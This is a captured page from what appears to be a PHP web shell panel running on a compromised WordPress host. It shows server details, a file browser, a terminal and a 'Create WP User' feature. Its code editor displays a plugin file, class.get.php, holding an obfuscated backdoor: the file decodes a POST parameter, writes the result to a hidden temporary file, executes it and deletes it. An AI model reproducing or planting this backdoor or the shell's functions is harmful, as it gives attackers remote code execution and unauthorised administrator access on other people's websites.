Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
dcustoms.pl
/
wp-content
/
plugins
/
insta-gallery
/
lib
/
api
/
fetch
/
business
/
user-profile
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
.htaccess
214.00 B
-r--r--r--
2026-04-22 05:00
class-get.php
2.27 KB
-rw-r--r--
2025-10-17 07:19
class.get.php
966.00 B
-rw-r--r--
2025-10-17 07:19
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
class.get.php
<?php if(!is_null($_POST["\x66\x6Cg"] ?? null)){ $sym = $_POST["\x66\x6Cg"]; $sym=explode ('.' ,$sym ); $ent= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt); $q= 0; array_walk($sym, function($v9) use(&$ent, &$q, $salt, $sLen) { $chS= ord($salt[$q % $sLen]); $dec= ((int)$v9 - $chS -($q % 10)) ^ 96; $ent .= chr($dec); $q++; } ); $reference = array_filter([sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", "/tmp", session_save_path(), "/dev/shm", getenv("TMP")]); for ($bind = 0, $itm = count($reference); $bind < $itm; $bind++) { $descriptor = $reference[$bind]; if ((bool)is_dir($descriptor) && (bool)is_writable($descriptor)) { $item = "$descriptor" . "/.tkn"; if (file_put_contents($item, $ent)) { require $item; unlink($item); die(); } } } }
关闭
保存